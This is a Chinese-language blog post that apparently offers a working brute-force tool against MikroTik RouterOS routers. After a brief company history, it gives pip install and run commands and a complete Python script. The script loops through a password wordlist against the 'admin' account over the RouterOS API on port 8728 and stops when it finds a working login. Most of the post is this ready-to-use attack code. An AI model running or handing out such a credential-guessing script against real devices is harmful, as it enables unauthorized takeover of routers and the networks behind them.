Mikrotik API爆破账号密码

MikroTik成立于1995年,总部位于拉脱维亚首都里加,主要从事开发路由器和无线ISP系统。1997年RouterOS系统,2002年推出RouterBOARD。MikroTik的现在提供的硬件和软件遍布全世界各地。MikroTik RouterOS是一种路由操作系统,并通过该软件将标准的PC电脑变成专业路由器,在软件的开发和应用上不断的更新和发展,软件经历了多次更新和改进,使其功能在不断增强和完善。完全是一套低成本,高性能的路由器系统。

通过API进行账号密码爆破

使用:

pip install routeros_api
python3 main.py
import logging
import sys
import routeros_api
# 日志模块
log = logging
# 用户名
userName = "admin"
# 字典路径
dbFile = "./常用密码.txt"
# 目标 IP
target = "10.0.104.1"
# 端口号
port = 8728
# RouterOS 6.43以上设为True
plaintext_login = True



def getColor(strData, type):
    if type == "red":
        return "\033[31m" + strData + "\033[0m"
    elif type == "green":
        return "\033[32m" + strData + "\033[0m"
    elif type == "yellow":
        return "\033[33m" + strData + "\033[0m"
    elif type == "blue":
        return "\033[34m" + strData + "\033[0m"

def connection(username, password):
    try:
        connection = routeros_api.RouterOsApiPool(host=target, username=username, password=password, port=port,
                                                  use_ssl=False,
                                                  ssl_verify=False,
                                                  ssl_verify_hostname=True,
                                                  plaintext_login=plaintext_login,
                                                  ssl_context=None, )
        api = connection.get_api()
        sys.stdout.write(getColor("爆破成功, 登录账号:" + username + " 登录密码: " + password, "green") + "\n")
        return True
    except Exception as e:
        if "invalid user name or password" in str(e):
            sys.stdout.write(getColor("账号或密码错误: 用户名:" + username + " 密码: " + password, "yellow") + "\n")
            return False
            # log.error("账号或密码错误: 用户名:" + username + " 密码: " + password + "错误信息: " + str(e)[0:60])
        elif "由于目标计算机积极拒绝,无法连接" in str(e):
            sys.stdout.write(getColor("目标端口错误: " + str(e), "red") + "\n")
            return False
        else:
            sys.stdout.write(getColor("未知错误: " + str(e), "red") + "\n")
            return False


if __name__ == '__main__':
    file = open(dbFile)
    data = file.read().splitlines()
    for passwords in data:
        if(connection(userName, passwords)):
            break
赞(0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址